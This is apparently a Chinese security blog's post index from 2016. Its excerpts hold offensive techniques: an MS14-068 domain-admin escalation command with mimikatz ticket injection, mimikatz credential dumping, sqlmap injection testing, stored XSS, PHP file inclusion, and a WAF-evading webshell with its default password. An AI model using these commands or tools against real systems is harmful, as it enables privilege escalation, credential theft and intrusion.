1 2 3 4 5 ··· 16 下一页
摘要: 可以让任何域内用户提升为域管理员 c:\python27\python.exe ms14-068.py -u k8test3@k8.local -p k8team!@# -s S-1-5-21-4191298166-3247023184-3514116461-1110 -d K8DNS.k8.localmimikatz.exe "kerberos::ptc TGT_k8test3@k8.... 阅读全文
posted @ 2016-04-12 15:05 h4ck0ne 阅读(2688) 评论(0) 推荐(0) 编辑
摘要: 其实我们在众测的时候完全可以使用burpsuite联合sqlmap测试目标的注入漏洞。对get和post型注入都支持。 先来记录proxy的log , 记住路径 把proxy拦截关掉 接下来浏览器配置代理,对目标站点一通请求,我一般都找页面比较偏僻的小功能 sqlmap对log一通测试 python sqlmap.py -l c:\log... 阅读全文
posted @ 2016-04-12 14:32 h4ck0ne 阅读(3640) 评论(0) 推荐(0) 编辑
摘要: windows 2012 抓明文密码方法 默认配置是抓不到明文密码了,神器mimikatz显示Password为null Authentication Id : 0 ; 121279 (00000000:0001d9bf) Session : ... 阅读全文
posted @ 2016-04-12 14:31 h4ck0ne 阅读(3833) 评论(0) 推荐(0) 编辑
摘要: 挖掘过程一: 自从上一次投稿,已经好久好久没写文章了。今天就着吃饭的时间,写篇文章,记录下自己学习xss这么久的心得。在我看来。Xss就是javascript注入,你可以在js语法规定的范畴内做任何事情,js可谓强大,本次结合一次挖掘xss的过程和xss的综合利用来探讨,小菜一枚,希望大牛不吝赐教。文章里的网站打码,大家见谅 我们先看看网站 测试储存型xss的话,黑盒测试效... 阅读全文
posted @ 2016-01-24 09:24 h4ck0ne 阅读(923) 评论(1) 推荐(0) 编辑
摘要: 详细说明: demo+本地演示存在XSS的地方在商务中心的商家资料的我的资料的Email那里(这句话好绕口。。),属于过滤不严格随便插字符的问题,我直接在Email那里写上"/>可以看到是正确的 然后点击提交可以看到说操作成功 然后来到我们的企业首页查看可以看到成功弹窗 再查看下源代码,可以看到是储存型的 本来想去后台查看的,但是无... 阅读全文
posted @ 2016-01-24 09:18 h4ck0ne 阅读(979) 评论(0) 推荐(0) 编辑
摘要: 最近发现一款过狗shell,分享下。。。 本地搭建2008SERVER+php5+阿帕奇+网站安全狗+服务器安全狗+防护全开 测试可用。。。 默认密码:p0tt1 使用方法: 访问webshell页面,出现404,没关系,按p键,输入密码 或者webshell.php?password=p0tt1自定义密码在 p0tt1为设定的密码,可以自行修改... 阅读全文
posted @ 2016-01-23 21:15 h4ck0ne 阅读(1471) 评论(0) 推荐(0) 编辑
摘要: Author:雪碧 http://weibo.com/520613815 此篇文章技术含量不高,大牛不喜勿喷,Thx!写这篇文章主要是为了各位小伙伴在SAE搭建XSSING平台的时候少走点弯路(同志们 我先去前面帮你们填好坑 =。=) 引用 XSSING平台开源中国资料: xssing ... 阅读全文
posted @ 2016-01-23 17:50 h4ck0ne 阅读(562) 评论(0) 推荐(0) 编辑
摘要: 有空就多整理下曾经研究过的知识和需要温顾的知识,明年可能去寻工作络.关于PHP中LFI(Local File Include,本地文件包含)漏洞,大家都很熟悉了;paper很多很多,特别是国外的...不过大家都懒得测试,我就来整理下.1.普通本地包含;poc:http://127.0.0.1:808... 阅读全文
posted @ 2016-01-23 17:50 h4ck0ne 阅读(510) 评论(0) 推荐(0) 编辑
摘要: cnrstar (Be My Personal Best!) | 2014-05-20 21:58众所周知,Mysql的用户在没有File权限情况下是无法通过Load_file读文件或者通过into dumpfile 或者into outfile去写文件,但是偶尔在一个网站上发现个小技巧,也就是通过... 阅读全文
posted @ 2016-01-23 17:50 h4ck0ne 阅读(1727) 评论(0) 推荐(0) 编辑
摘要: (1)mysql_real_escape_string -- 转义 SQL 语句中使用的字符串中的特殊字符,并考虑到连接的当前字符集使用方法如下: $sql = "select count(*) as ctr from users where username ='".... 阅读全文
posted @ 2016-01-23 17:50 h4ck0ne 阅读(423) 评论(0) 推荐(0) 编辑
1 2 3 4 5 ··· 16 下一页